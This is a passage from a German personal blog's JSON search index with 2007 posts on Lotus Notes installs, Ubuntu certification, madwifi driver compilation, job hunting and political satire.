Lokalpolitiker namentlich durch den Kakao gezogen.\n:-)\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-07-05-biermosl-blosn-im-festzelt-greimharting/","title":"Biermösl Blosn im Festzelt Greimharting"},{"body":"Bei der Installation des nativen Linux Clients bin ich heute gescheitert. Ich versuchte die Installation auf Ubuntu 7.04, allerdings steht in den Anforderungen (Mozilla 1.7.1) was ist damit gemeint? In den Ubuntu Reopositories war ich nicht fündig. Mal sehen, ob ich da noch was nachinstallieren kann.\nAuf jeden Fall bricht die Installation mit der Meldung ab, dass die Mozilla Version nicht verifiziert werden kann.\n","excerpt":"\u003cp\u003eBei der Installation des nativen Linux Clients bin ich heute\ngescheitert. Ich versuchte die Installation auf Ubuntu 7.04, allerdings\nsteht in den Anforderungen (Mozilla 1.7.1) was ist damit gemeint? In den\nUbuntu Reopositories war ich nicht fündig. Mal sehen, ob ich da noch was\nnachinstallieren kann.\u003c/p\u003e\n\u003cp\u003eAuf jeden Fall bricht die Installation mit der Meldung ab, dass die\nMozilla Version nicht verifiziert werden kann.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-07-05-lotus-notes-client-701-on-ubuntu/","title":"Lotus Notes Client 7.0.1 on Ubuntu"},{"body":"Heute bin ich endlich mal dazu gekommen den Lotus Notes Client 7.0.2 am Macbook zu testen.\nIch war erstaunt, daß Notes so schnell startet, die Schriftglättung so gut funktioniert und auch die Bedienung um einiges flotter ist, als unter Windows. Der Notes Client startet in wenigen Sekunden. Das öffnen einer Datenbank geht auch ruckzuck!\nSchade ist nur, daß es den Admin und Designer Client nicht für Mac OS gibt. Im Moment behelfe ich mir mit der webadmin.nsf, die aber leider unter Camino nicht funktioniert. Mit Firefox war das aber kein Problem. Jetzt brauche ich nur noch eine Möglichkeit für den Designer. Hoffentlich funktioniert die Notes 8 auf Mac OS ähnlich schnell, da kann man dann mit dem Eclipse Framework programmieren.\n","excerpt":"\u003cp\u003eHeute bin ich endlich mal dazu gekommen den Lotus Notes Client 7.0.2 am\nMacbook zu testen.\u003c/p\u003e\n\u003cp\u003eIch war erstaunt, daß Notes so schnell startet, die Schriftglättung so\ngut funktioniert und auch die Bedienung um einiges flotter ist, als\nunter Windows. Der Notes Client startet in wenigen Sekunden. Das öffnen\neiner Datenbank geht auch ruckzuck!\u003c/p\u003e\n\u003cp\u003eSchade ist nur, daß es den Admin und Designer Client nicht für Mac OS\ngibt. Im Moment behelfe ich mir mit der webadmin.nsf, die aber leider\nunter Camino nicht funktioniert. Mit Firefox war das aber kein Problem.\nJetzt brauche ich nur noch eine Möglichkeit für den Designer.\nHoffentlich funktioniert die Notes 8 auf Mac OS ähnlich schnell, da kann\nman dann mit dem Eclipse Framework programmieren.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-07-02-lotus-notes-702-on-mac-os-x/","title":"Lotus Notes 7.0.2 on Mac OS X"},{"body":"Auf der Ubuntu Homepage ist eine Zertifizierung für Ubuntu Linux angekündigt worden.\nAls Vorbereitung für die Zertifizierung werden zwei Kurse à fünf Tage angeboten. Die ersten Kurse in Deutschland finden in Berlin und Münster statt.\nDie Zertifizierung basiert auf den LPI Prüfungen 101 und 102 und einem Ubuntu LPI 199 Test. Nähere Information zum Inhalt dieser Kurse findet man bei Ubuntu und dem LPI .\nMich würde die Zertifizierung sehr interessieren, ich habe aber noch keine näheren Informationen zum Inhalt des LPI 199 gefunden. Die Prüfung 101 und 102 möchte ich demnächst absolvieren, ich übe bereits seit ein paar Wochen mit dem Buch LPIC-1 von Peer Heinlein .\n","excerpt":"\u003cp\u003eAuf der \u003ca href=\"http://www.ubuntu.com\" target=\"_blank\"\u003eUbuntu Homepage \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n ist eine Zertifizierung\nfür Ubuntu Linux\n\u003ca href=\"http://www.ubuntu.com/news/traicen-training-partnership\" target=\"_blank\"\u003eangekündigt \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\nworden.\u003c/p\u003e\n\u003cp\u003eAls Vorbereitung für die Zertifizierung werden zwei Kurse à fünf Tage\nangeboten. Die ersten Kurse in Deutschland finden in\n\u003ca href=\"http://webapps.ubuntu.com/course_locator/country_DE/\" target=\"_blank\"\u003eBerlin und Münster \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\nstatt.\u003c/p\u003e\n\u003cp\u003eDie Zertifizierung basiert auf den \u003ca href=\"http://www.lpi.org\" target=\"_blank\"\u003eLPI \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n Prüfungen 101\nund 102 und einem Ubuntu LPI 199 Test. Nähere Information zum Inhalt\ndieser Kurse findet man\n\u003ca href=\"http://www.ubuntu.com/partners/training/certificationcourses/professional\" target=\"_blank\"\u003ebei\nUbuntu \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n und dem\n\u003ca href=\"http://www.lpi.org/en/lpi/english/certification/ubuntu_certified_professional\" target=\"_blank\"\u003eLPI \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eMich würde die Zertifizierung sehr interessieren, ich habe aber noch\nkeine näheren Informationen zum Inhalt des LPI 199 gefunden. Die Prüfung\n101 und 102 möchte ich demnächst absolvieren, ich übe bereits seit ein\npaar Wochen mit dem\n\u003ca href=\"https://www.opensourcepress.de/index.php?26\u0026amp;backPID=15\u0026amp;tt_products=84\" target=\"_blank\"\u003eBuch\nLPIC-1 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n von \u003ca href=\"http://www.heinlein-support.de/\" target=\"_blank\"\u003ePeer Heinlein \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-06-26-ubuntu-zertifizierung/","title":"Ubuntu Zertifizierung"},{"body":"Ein schönes Tool um die Ladezeiten von Webseiten zu überprüfen sind die Pingdom Tools . Ich habe damit z.B. festgestellt, daß drei Grafiken aus meinen Stylesheets nicht mehr im Pfad vorhanden waren.\nAllerdings ist mir auch aufgefallen, daß die Startseite über 100 kB hat. Das halte ich für etwas zu viel. Es gibt inzwischen zwar viele DSL-Anschlüsse, aber die Modem- und ISDN-Benutzer sind meiner Meinung nach nicht zu unterschätzen und für die sind 100 kB sicher zu viel, bzw. eine große Belastung.\nEventuell als Aufruf für ein Stöckchen? Wie ist die Ladezeit eures Blogs?\n","excerpt":"\u003cp\u003eEin schönes Tool um die Ladezeiten von Webseiten zu überprüfen sind die\n\u003ca href=\"http://tools.pingdom.com/fpt/\" target=\"_blank\"\u003ePingdom Tools \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. Ich habe damit z.B.\nfestgestellt, daß drei Grafiken aus meinen Stylesheets nicht mehr im\nPfad vorhanden waren.\u003c/p\u003e\n\u003cp\u003eAllerdings ist mir auch aufgefallen, daß die Startseite über 100 kB hat.\nDas halte ich für etwas zu viel. Es gibt inzwischen zwar viele\nDSL-Anschlüsse, aber die Modem- und ISDN-Benutzer sind meiner Meinung\nnach nicht zu unterschätzen und für die sind 100 kB sicher zu viel, bzw.\neine große Belastung.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://wp.stoeps.de/wp-content/uploads/2007/06/capturedata78.jpg\" target=\"_blank\"\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"http://wp.stoeps.de/wp-content/uploads/2007/06/capturedata78.jpg\" alt=\"Pingdom Ergebnis für www.stoeps.de\" /\u003e\n\u003c/p\u003e\n\n \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eEventuell als Aufruf für ein Stöckchen? Wie ist die Ladezeit eures\nBlogs?\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-06-23-ladezeit-der-homepage-uberprufen/","title":"Ladezeit der Homepage überprüfen"},{"body":"Früher in der Schule war ich ziemlich schlecht in Englisch. Ich dachte immer, daß ich einfach kein Talent für Sprachen habe.\nAls ich dann 1992/93 meine ersten Linux Installationen gemacht habe, das war damals noch mit Slackware, da kam ich um englische Handbücher, Tutorials und manpages nicht herum.\nIm Moment macht mir Englisch wieder richtig Spaß und ich habe einige englische Podcasts abonniert und erarbeite mir bei der VHS ein Cambridge First Certificate. Diesen Kurs kann ich eigentlich jedem empfehlen, der seine Englischkenntnisse auffrischen will. Es werden sowohl Schreiben, Lesen und Sprechen geübt und später geprüft.\nUpdate Achja, ich muss dazusagen, daß ich jetzt bereits drei Bewerbungsgespräche in Englisch geführt habe und denke daß ich mich ganz gut geschlagen habe. Ich hab den Job zwar nicht angenommen, aber das liegt an den Zeitvorgaben der Firma und meiner Kündigungsfrist…\nHier folgen ein paar Links, die mir weitergeholfen haben:\nLinks Englisch lernen http://uncensored.betteratenglish.com/ (Slang, z.T. nicht grandma-safe)\nhttp://www.betteratenglish.com/ http://www.cambridge.org/elt/objective/ http://www.englisch-hilfen.de Wörterbücher http://dict.leo.org http://translate.google.com/translate_dict Spaß mit Englisch – Englisch für Fortgeschrittene http://www.susanne-und-dirk.de/runaways.html http://www.frigger.de/index.php?/engl.htm http://www.cyber-tango.com/jokes/jokes_s.html http://www.wolles-website.de/unfug/english_01.html http://www.chronik.ch/english.shtml ","excerpt":"\u003cp\u003eFrüher in der Schule war ich ziemlich schlecht in Englisch. Ich dachte\nimmer, daß ich einfach kein Talent für Sprachen habe.\u003c/p\u003e\n\u003cp\u003eAls ich dann 1992/93 meine ersten Linux Installationen gemacht habe, das\nwar damals noch mit Slackware, da kam ich um englische Handbücher,\nTutorials und manpages nicht herum.\u003c/p\u003e\n\u003cp\u003eIm Moment macht mir Englisch wieder richtig Spaß und ich habe einige\nenglische Podcasts abonniert und erarbeite mir bei der VHS ein Cambridge\nFirst Certificate. Diesen Kurs kann ich eigentlich jedem empfehlen, der\nseine Englischkenntnisse auffrischen will. Es werden sowohl Schreiben,\nLesen und Sprechen geübt und später geprüft.\u003c/p\u003e\n\u003ch1 id=\"update\"\u003eUpdate \u003ca href=\"#update\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003e\u003cstrong\u003eAchja, ich muss dazusagen, daß ich jetzt bereits drei\nBewerbungsgespräche in Englisch geführt habe und denke daß ich mich ganz\ngut geschlagen habe. Ich hab den Job zwar nicht angenommen, aber das\nliegt an den Zeitvorgaben der Firma und meiner Kündigungsfrist…\u003c/strong\u003e\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-06-22-english-for-runaways/","title":"English for Runaways – Englisch für Fortgeschrittene"},{"body":"Jetzt bin ich endlich dazugekommen, den offiziellen Snapshot von Madwifi zu kompilieren und zu installieren. Die neue HAL, die auch die Atheros-Karten der intelbasierten Apple MacBooks enthält ist seit ein paar Wochen Teil der offiziellen Madwifi-ng-Sourcen.\nDie Installation war nicht weiter schwierig. Da ein neuer Kernel in Ubuntu Einzug gehalten hat, hier gleich mit den gerade aktuellen Kernelquellen.\ntar -xvzf madwifi-ng-r2471-20070617.tar.gz\u0026lt;br /\u0026gt; cd madwifi-ng-r2471-20070617\u0026lt;br /\u0026gt; sudo make KERNELPATH=/usr/src/linux-headers-2.6.20-16-generic/\u0026lt;br /\u0026gt; sudo make install\u0026lt;br /\u0026gt;\nFalls bereits eine Version der Madwifi-Module installiert ist, fragt das Install-Skript, was mit diesen Geschehen soll. Hier am Besten r für remove wählen. Ich denke es ist ein Neustart notwendig, damit das Modul richtig geladen wird.\n","excerpt":"\u003cp\u003eJetzt bin ich endlich dazugekommen, den\n\u003ca href=\"http://snapshots.madwifi.org/madwifi-ng/\" target=\"_blank\"\u003eoffiziellen Snapshot \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n von\n\u003ca href=\"http://www.madwifi.org\" target=\"_blank\"\u003eMadwifi \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n zu kompilieren und zu installieren. Die\nneue HAL, die auch die Atheros-Karten der intelbasierten Apple MacBooks\nenthält ist seit ein paar Wochen Teil der offiziellen\nMadwifi-ng-Sourcen.\u003c/p\u003e\n\u003cp\u003eDie Installation war nicht weiter schwierig. Da ein neuer Kernel in\nUbuntu Einzug gehalten hat, hier gleich mit den gerade aktuellen\nKernelquellen.\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003etar -xvzf madwifi-ng-r2471-20070617.tar.gz\u0026lt;br /\u0026gt; cd madwifi-ng-r2471-20070617\u0026lt;br /\u0026gt; sudo make KERNELPATH=/usr/src/linux-headers-2.6.20-16-generic/\u0026lt;br /\u0026gt; sudo make install\u0026lt;br /\u0026gt;\u003c/code\u003e\u003c/p\u003e\n\u003cp\u003eFalls bereits eine Version der Madwifi-Module installiert ist, fragt das\nInstall-Skript, was mit diesen Geschehen soll. Hier am Besten r für\nremove wählen. Ich denke es ist ein Neustart notwendig, damit das Modul\nrichtig geladen wird.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-06-17-madwifi-ng-am-macbook-intel-core2duo/","title":"Madwifi-ng am Macbook Intel Core2Duo"},{"body":"---------------------------\u0026lt;br /\u0026gt; foo\u0026lt;br /\u0026gt; ---------------------------\u0026lt;br /\u0026gt; ---------------------------\u0026lt;br /\u0026gt; OK\u0026lt;br /\u0026gt; --------------------------- Original-Post Ein sehr alter Post, aber ich kannte den Tipp noch nicht.\nDieser Tipp funktioniert ab Windows 2000. Viele Windows-Entwickler packen Fehlermeldungen in PopUp-Fenster, die mit JA, NEIN, OK etc. bestätigt werden müssen. Oft kann man mit diesem Fehlertext bei Google die Lösung des Problems finden. Aber wie den Text einfügen?\nWindows Fehlermeldungen kann man einfach mit Strg+C in die Zwischenablage kopieren und als Text (Strg-V) wieder einfügen.\nBeispiel Start - Ausführen - foo\n---------------------------\u0026lt;br /\u0026gt; foo\u0026lt;br /\u0026gt; ---------------------------\u0026lt;br /\u0026gt; \u0026quot;foo\u0026quot; konnte nicht gefunden werden. Stellen Sie sicher, dass Sie den Namen korrekt eingegeben haben und wiederholen Sie den Vorgang. Klicken Sie auf \u0026quot;Start\u0026quot; und anschließend auf \u0026quot;Suchen\u0026quot;, um eine Datei zu suchen.\u0026lt;br /\u0026gt; ---------------------------\u0026lt;br /\u0026gt; OK\u0026lt;br /\u0026gt; ---------------------------\nEin wirklich praktischer Tipp, jetzt kann man mit dem Originaltext in Google nach der Lösung suchen.\n","excerpt":"\u003cp\u003e\u003ccode\u003e---------------------------\u0026lt;br /\u0026gt; foo\u0026lt;br /\u0026gt; ---------------------------\u0026lt;br /\u0026gt; ---------------------------\u0026lt;br /\u0026gt; OK\u0026lt;br /\u0026gt; ---------------------------\u003c/code\u003e\n\u003ca href=\"http://weblogs.asp.net/chuckop/archive/2004/04/08/110153.aspx\" target=\"_blank\"\u003eOriginal-Post \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eEin sehr alter Post, aber ich kannte den Tipp noch nicht.\u003c/p\u003e\n\u003cp\u003eDieser Tipp funktioniert ab Windows 2000. Viele Windows-Entwickler\npacken Fehlermeldungen in PopUp-Fenster, die mit JA, NEIN, OK etc.\nbestätigt werden müssen. Oft kann man mit diesem Fehlertext bei Google\ndie Lösung des Problems finden. Aber wie den Text einfügen?\u003c/p\u003e\n\u003cp\u003eWindows Fehlermeldungen kann man einfach mit Strg+C in die\nZwischenablage kopieren und als Text (Strg-V) wieder einfügen.\u003c/p\u003e\n\u003ch1 id=\"beispiel\"\u003eBeispiel \u003ca href=\"#beispiel\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003e\u003ccode\u003eStart - Ausführen - foo\u003c/code\u003e\u003c/p\u003e\n\u003cp\u003e      \u003ca href=\"http://wp.stoeps.de/wp-content/uploads/2007/06/2007-06-14_085041.jpg\" target=\"_blank\"\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"http://wp.stoeps.de/wp-content/uploads/2007/06/2007-06-14_085041-150x128.jpg\" alt=\"Windows Fehlermeldung\" /\u003e\n\u003c/p\u003e\n\n \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003e---------------------------\u0026lt;br /\u0026gt; foo\u0026lt;br /\u0026gt; ---------------------------\u0026lt;br /\u0026gt; \u0026quot;foo\u0026quot; konnte nicht gefunden werden. Stellen Sie sicher, dass Sie den Namen korrekt eingegeben haben und wiederholen Sie den Vorgang. Klicken Sie auf \u0026quot;Start\u0026quot; und anschließend auf \u0026quot;Suchen\u0026quot;, um eine Datei zu suchen.\u0026lt;br /\u0026gt; ---------------------------\u0026lt;br /\u0026gt; OK\u0026lt;br /\u0026gt; ---------------------------\u003c/code\u003e\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-06-14-windows-fehlermeldung-in-zwischenablage-kopieren/","title":"Windows Fehlermeldung in Zwischenablage kopieren"},{"body":"Mindplan wurde mir jetzt bereits zweimal vorgestellt und ich hatte bereits zweimal einen Demokey, um selbst ein paar Tests durchzuführen. Ein wirklich schönes Tool, das sich in Notes integriert und sämtliche Daten auch in einer Notesdatenbank ablegt. Man kann also sämtliche Notesfeatures anwenden und die Datenbank replizieren und im Offline-Betrieb weiterbearbeiten.\nDie letzte und beste Vorführung sah ich in Rosenheim von Otto Förg von der Fa. Edcom und da hat mich das Produkt doch ziemlich überzeugt. Man kann sehr einfach im Mind Map Modus die Planungen von Projekten vorbereiten, oder auch während Besprechungen beim Brainstorming erfassen.\nMit einem Klick springt die Ansicht auf Gantt und man kann Abhängigkeiten etc. definieren. Wirklich simpel. Einige meiner Anwender testen jetzt seit ein paar Wochen und hören sich durchwegs zufrieden an.\n","excerpt":"\u003cp\u003e\u003ca href=\"http://www.mindplan.de\" target=\"_blank\"\u003eMindplan \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n wurde mir jetzt bereits zweimal\nvorgestellt und ich hatte bereits zweimal einen Demokey, um selbst ein\npaar Tests durchzuführen. Ein wirklich schönes Tool, das sich in Notes\nintegriert und sämtliche Daten auch in einer Notesdatenbank ablegt. Man\nkann also sämtliche Notesfeatures anwenden und die Datenbank replizieren\nund im Offline-Betrieb weiterbearbeiten.\u003c/p\u003e\n\u003cp\u003eDie letzte und beste Vorführung sah ich in Rosenheim von Otto Förg von\nder \u003ca href=\"http://www.edcom.de\" target=\"_blank\"\u003eFa. Edcom \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n und da hat mich das Produkt doch\nziemlich überzeugt. Man kann sehr einfach im Mind Map Modus die\nPlanungen von Projekten vorbereiten, oder auch während Besprechungen\nbeim Brainstorming erfassen.\u003c/p\u003e\n\u003cp\u003eMit einem Klick springt die Ansicht auf Gantt und man kann\nAbhängigkeiten etc. definieren. Wirklich simpel. Einige meiner Anwender\ntesten jetzt seit ein paar Wochen und hören sich durchwegs zufrieden an.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-06-13-mindplan-mind-map-und-projektmanagement-mit-lotus-notes/","title":"Mind Map und Projektmanagement mit Lotus Notes"},{"body":"So, jetzt hab ich mich telefonisch bei der Agentur für Arbeit “arbeitssuchend” gemeldet.\nEin paar nette Einladungen zu Telefoninterviews und Bewerbungsgesprächen habe ich zwar schon, aber ich will natürlich nicht irgendeine Frist übersehen und durch einen blöden Zufall dann ohne alles auf der Straße stehen.\nDas Telefonat war ganz locker. Ich habe jetzt eine Kundennummer bei der Agentur für Arbeit. :-) Schon lustig, auf was für Ideen Berater kommen können. Aber es ist psychologisch sicher wichtig, daß man sich dort als Kunde sieht und nicht als lästiger Bittsteller oder so.\nHotline Mein erstes Gespräch war mit der Hotline, die Stimme vom Band erklärte mir um 14:10 Uhr, daß die Warteschlange voll ist und ich besser Montags bis Freitags von 14 bis 18 Uhr anrufen soll, weil man dann besser durchkommt. Naja egal, nach ca. 5 Minuten ging dann jemand ran und erteilte mir meine Kundennummer.\nSoviel zum ersten Kontakt mit der Agentur für Arbeit.\nLob Ein dickes Lob an die Mitarbeiter der Agentur, mit denen ich heute gesprochen habe, sie waren alle sehr freundlich und wirkten auf mich sehr beruhigend.\n","excerpt":"\u003cp\u003eSo, jetzt hab ich mich telefonisch bei der Agentur für Arbeit\n“arbeitssuchend” gemeldet.\u003c/p\u003e\n\u003cp\u003eEin paar nette Einladungen zu Telefoninterviews und Bewerbungsgesprächen\nhabe ich zwar schon, aber ich will natürlich nicht irgendeine Frist\nübersehen und durch einen blöden Zufall dann ohne alles auf der Straße\nstehen.\u003c/p\u003e\n\u003cp\u003eDas Telefonat war ganz locker. Ich habe jetzt eine \u003cstrong\u003eKundennummer\u003c/strong\u003e bei\nder Agentur für Arbeit. :-) Schon lustig, auf was für Ideen Berater\nkommen können. Aber es ist psychologisch sicher wichtig, daß man sich\ndort als Kunde sieht und nicht als lästiger Bittsteller oder so.\u003c/p\u003e\n\u003ch1 id=\"hotline\"\u003eHotline \u003ca href=\"#hotline\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eMein erstes Gespräch war mit der Hotline, die Stimme vom Band erklärte\nmir um 14:10 Uhr, daß die Warteschlange voll ist und ich besser Montags\nbis Freitags von 14 bis 18 Uhr anrufen soll, weil man dann besser\ndurchkommt. Naja egal, nach ca. 5 Minuten ging dann jemand ran und\nerteilte mir meine Kundennummer.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-06-13-arbeitssuchend-gemeldet/","title":"Arbeitssuchend gemeldet"},{"body":"Viele werden es noch nicht wissen, aber ich habe gestern nach fast sieben Jahren, meinen Job in Rosenheim gekündigt.\nMir fehlten einfach Perspektiven für die nächsten Jahre. Das Team ist im Alterdurchschnitt etwa 40-45 Jahre alt und ich bin durch mein abgebrochenes Studium am Ende der Karriereleiter (Stellv. Sachgebietsleiter) angekommen. Eine Tarifgruppenstufe wäre noch möglich gewesen, aber danach wäre definitiv Schluß. Dafür fühle ich mich noch zu jung.\nIch bin ab dem 1. Oktober 2007 für eine neue Stelle verfügbar und würde mich freuen, wenn auch Angebote von meinen Bloglesern oder über Suchmaschinenbesucher kommen.\nAuf der Seite Jobsuche habe ich meine Zeugnisse, Zertifikate und ein paar wichtige Rahmendaten veröffentlicht, damit niemand die “Katze im Sack” kaufen muss.\n","excerpt":"\u003cp\u003eViele werden es noch nicht wissen, aber ich habe gestern nach fast\nsieben Jahren, meinen Job in Rosenheim gekündigt.\u003c/p\u003e\n\u003cp\u003eMir fehlten einfach Perspektiven für die nächsten Jahre. Das Team ist im\nAlterdurchschnitt etwa 40-45 Jahre alt und ich bin durch mein\nabgebrochenes Studium am Ende der Karriereleiter (Stellv.\nSachgebietsleiter) angekommen. Eine Tarifgruppenstufe wäre noch möglich\ngewesen, aber danach wäre definitiv Schluß. Dafür fühle ich mich noch zu\njung.\u003c/p\u003e\n\u003cp\u003eIch bin ab dem \u003cstrong\u003e1. Oktober 2007\u003c/strong\u003e für eine neue Stelle verfügbar und\nwürde mich freuen, wenn auch Angebote von meinen Bloglesern oder über\nSuchmaschinenbesucher kommen.\u003c/p\u003e\n\u003cp\u003eAuf der Seite \u003ca href=\"https://www.stoeps.de/jobsearch\" target=\"_blank\"\u003eJobsuche \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n habe ich meine\nZeugnisse, Zertifikate und ein paar wichtige Rahmendaten veröffentlicht,\ndamit niemand die “Katze im Sack” kaufen muss.\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-06-12-jobsuche-mit-web-20/","title":"Jobsuche mit Web 2.0"},{"body":"Bei der irischen Noteskonferenz ILUG 2007 wurde ein Framework für Lotus Notes Application Development vorgestellt. Jetzt wurde die erste Version auf OpenNTF veröffentlicht.\nOpenNTF.org – About SuperNTF :\nSuperNTF is a Notes Client application framework built from the ground up with the goal of making development best practice easy for even novice Notes developers.\n","excerpt":"\u003cp\u003eBei der irischen \u003ca href=\"http://www.ilug2007.org/\" target=\"_blank\"\u003eNoteskonferenz ILUG 2007 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\nwurde ein Framework für Lotus Notes Application Development vorgestellt.\nJetzt wurde die erste Version auf OpenNTF veröffentlicht.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www.openntf.org/Projects/pmt.nsf/ProjectLookup/SuperNTF\" target=\"_blank\"\u003eOpenNTF.org\n– About SuperNTF \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eSuperNTF is a Notes Client application framework built from the ground\nup with the goal of making development best practice easy for even\nnovice Notes developers.\u003c/p\u003e\u003c/blockquote\u003e","ref":"https://stoeps.de/posts/2007/2007-06-12-openntf-superntf-von-kevin-pettitt-veroffentlicht/","title":"OpenNTF: SuperNTF von Kevin Pettitt veröffentlicht"},{"body":"[satire]Es ist wirklich unglaublich, was den Hörspielautoren da so einfällt. Polizisten und Politiker werden nur von der negativsten Seite dargestellt.\nIch fordere, daß Bibi und Benjamin verboten werden, oder aber höchsten nach Vorlage einer EC-Karte mit Chip (wie am Zigarettenautomaten) oder eines Reisepasses inkl. Fingerabdruck und Passbild über den Ladentisch gehen. Werbung für die Hörspiele gehören natürlich auch verboten! Wo kämen wir da denn hin.[/satire]\nLink: Bundeszentrale für politische Bildung Gefunden bei: lawblog.de ","excerpt":"\u003cp\u003e[satire]Es ist wirklich unglaublich, was den Hörspielautoren da so\neinfällt. Polizisten und Politiker werden nur von der negativsten Seite\ndargestellt.\u003c/p\u003e\n\u003cp\u003eIch fordere, daß Bibi und Benjamin verboten werden, oder aber höchsten\nnach Vorlage einer EC-Karte mit Chip (wie am Zigarettenautomaten) oder\neines Reisepasses inkl. Fingerabdruck und Passbild über den Ladentisch\ngehen. Werbung für die Hörspiele gehören natürlich auch verboten! Wo\nkämen wir da denn hin.[/satire]\u003c/p\u003e\n\u003cp\u003eLink:\n\u003ca href=\"http://www.bpb.de/publikationen/2RQI2Y,2,0,Politik_bei_Benjamin_Bl%FCmchen_und_Bibi_Blocksberg.html#art2\" target=\"_blank\"\u003eBundeszentrale\nfür politische Bildung \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eGefunden bei:\n\u003ca href=\"http://www.lawblog.de/index.php/archives/2007/06/10/bibi-und-benjamin-verderben-die-jugend/\" target=\"_blank\"\u003elawblog.de \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-06-10-bibi-blocksberg-und-benjamin-blumchen-gehoren-verboten/","title":"Bibi Blocksberg und Benjamin Blümchen gehören verboten"},{"body":"heise online – Identifikationsnummer für alle Bürger kommt ab Juli :\nNach derzeitiger Gesetzeslage soll nur das Finanzamt Daten beim BZSt abrufen dürfen, andere Behörden lediglich in Ausnahmesituationen. Um das Kontrollnetz enger zu ziehen, könnten laut Ondraczek aber in Bälde weitere Gesetzesgrundlagen geschaffen werden.\nUnd der nächste Schritt zur Totalerfassung ist getan. Wie bereits bei den Mautdaten, kann man bereits jetzt die ersten Begehrlichkeiten anderer staatlicher Institutionen am Horizont entdecken.\nIn diesem Zug werden die Daten der 5500 Meldebehörden zentral beim Bundesamt für Steuern zusammengeführt. Welche Daten sind das eigentlich? Alle Daten der Meldebehörden, also auch die des digitalen Passbildes?\nUpdate: 10. Juni 2007 outdated: true\nInteressantes zur Personenkennziffer findet ihr auch bei gulli.com .\n","excerpt":"\u003cp\u003e\u003ca href=\"http://www.heise.de/newsticker/meldung/90890\" target=\"_blank\"\u003eheise online –\nIdentifikationsnummer für alle Bürger kommt ab Juli \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eNach derzeitiger Gesetzeslage soll nur das Finanzamt Daten beim BZSt\nabrufen dürfen, andere Behörden lediglich in Ausnahmesituationen. Um das\nKontrollnetz enger zu ziehen, könnten laut Ondraczek aber in Bälde\nweitere Gesetzesgrundlagen geschaffen werden.\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003eUnd der nächste Schritt zur Totalerfassung ist getan. Wie bereits bei\nden Mautdaten, kann man bereits jetzt die ersten Begehrlichkeiten\nanderer staatlicher Institutionen am Horizont entdecken.\u003c/p\u003e\n\u003cp\u003eIn diesem Zug werden die Daten der 5500 Meldebehörden zentral beim\nBundesamt für Steuern zusammengeführt. Welche Daten sind das eigentlich?\nAlle Daten der Meldebehörden, also auch die des digitalen Passbildes?\u003c/p\u003e","ref":"https://stoeps.de/posts/2007/2007-06-09-heise-bundesrat-nickt-personenkennziffer-ab/","title":"heise: Bundesrat nickt Personenkennziffer ab"},{"body":"Die Überschrift ist sicher etwas krass formuliert, trifft aber das komplette Spektrum der Aussagen, die man zur 